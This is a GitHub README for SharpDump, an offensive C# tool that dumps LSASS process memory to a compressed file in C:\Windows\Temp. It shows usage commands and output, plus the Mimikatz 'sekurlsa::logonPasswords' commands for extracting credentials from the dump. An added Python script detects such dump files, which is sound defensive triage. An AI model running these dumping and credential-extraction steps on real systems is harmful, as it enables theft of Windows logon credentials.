SharpDump is a C# port of PowerSploit's Out-Minidump.ps1 functionality.
HarmJ0y Merge pull request #2 from ClementNotin/patch-1
Create .gitignore with common VS exclusions
Latest commit 467496b Aug 20, 2018
SharpDump initial commit Jul 24, 2018
.gitignore Create .gitignore with common VS exclusions Jul 25, 2018
LICENSE initial commit Jul 24, 2018
README.md update README.md Jul 24, 2018
SharpDump.sln initial commit Jul 24, 2018

README.md

SharpDump


SharpDump is a C# port of PowerSploit's Out-Minidump.ps1 functionality. The MiniDumpWriteDump Win32 API call is used to create a minidump for the specified process ID (LSASS by default) at C:\Windows\Temp\debug.out. GZipStream then compresses the dump to C:\Windows\Temp\debug.bin (.gz format), and the original minidump file is deleted. In the sample output under Usage, the process ID is appended to both file names (for example debug808.out and debug808.bin).

@harmj0y is the primary author of this port.

SharpDump is licensed under the BSD 3-Clause license.

Usage

Dump LSASS:

C:\Temp>SharpDump.exe

[*] Dumping lsass (808) to C:\WINDOWS\Temp\debug808.out
[+] Dump successful!

[*] Compressing C:\WINDOWS\Temp\debug808.out to C:\WINDOWS\Temp\debug808.bin gzip file
[*] Deleting C:\WINDOWS\Temp\debug808.out

[+] Dumping completed. Rename file to "debug808.gz" to decompress.

[*] Operating System : Windows 10 Enterprise N
[*] Architecture     : AMD64
[*] Use "sekurlsa::minidump debug.out" "sekurlsa::logonPasswords full" on the same OS/arch

Dump a specific process ID:

C:\Temp>SharpDump.exe 8700

[*] Dumping notepad++ (8700) to C:\WINDOWS\Temp\debug8700.out
[+] Dump successful!

[*] Compressing C:\WINDOWS\Temp\debug8700.out to C:\WINDOWS\Temp\debug8700.bin gzip file
[*] Deleting C:\WINDOWS\Temp\debug8700.out

[+] Dumping completed. Rename file to "debug8700.gz" to decompress.
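
For triage of the artifacts described above, the following added example (not part of SharpDump or its README) scans a directory for raw minidumps and for gzip streams whose payload is a minidump, judging by file content so that a renamed file is still found. The name pattern is an assumption inferred from the sample output, and the sample files are constructed stubs.

```python
import gzip
import re
import tempfile
import zlib
from pathlib import Path

GZIP_MAGIC = b"\x1f\x8b"
MDMP_MAGIC = b"MDMP"  # first four bytes of a Windows minidump header
# Assumption: name pattern inferred from the README's sample output.
NAME_RE = re.compile(r"^debug\d*\.(out|bin)$", re.IGNORECASE)

def classify(path):
    """Return 'minidump', 'gzip-minidump' or None, judging by content only."""
    with path.open("rb") as fh:
        head = fh.read(4)
        if head == MDMP_MAGIC:
            return "minidump"
        if head[:2] != GZIP_MAGIC:
            return None
        fh.seek(0)
        try:
            # Decompress only the first four bytes of the payload.
            with gzip.GzipFile(fileobj=fh) as gz:
                inner = gz.read(4)
        except (OSError, EOFError, zlib.error):
            return None  # truncated or corrupt gzip stream
    return "gzip-minidump" if inner == MDMP_MAGIC else None

def scan(directory):
    """Return (file name, kind, name matches README pattern) per dump found."""
    hits = []
    for p in sorted(Path(directory).iterdir()):
        kind = classify(p) if p.is_file() else None
        if kind:
            hits.append((p.name, kind, bool(NAME_RE.match(p.name))))
    return hits

def demo():
    """Run scan() over constructed sample files (no real dump data)."""
    stub = MDMP_MAGIC + b"\x00" * 28  # constructed header stub
    with tempfile.TemporaryDirectory() as d:
        Path(d, "debug808.bin").write_bytes(gzip.compress(stub))
        Path(d, "report.dat").write_bytes(gzip.compress(stub))  # renamed copy
        Path(d, "debug8700.out").write_bytes(stub)
        Path(d, "logs.gz").write_bytes(gzip.compress(b"plain text log"))
        Path(d, "trunc.bin").write_bytes(GZIP_MAGIC)  # truncated gzip
        return scan(d)

if __name__ == "__main__":
    for hit in demo():
        print(hit)
```

A hit whose third field is False is a dump stored under a name other than the ones shown in the sample output.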

Compile Instructions

We are not planning on releasing binaries for SharpDump, so you will have to compile it yourself :)

SharpDump has been built against .NET 3.5 and is compatible with Visual Studio 2015 Community Edition. Simply open up the project .sln, choose "release", and build.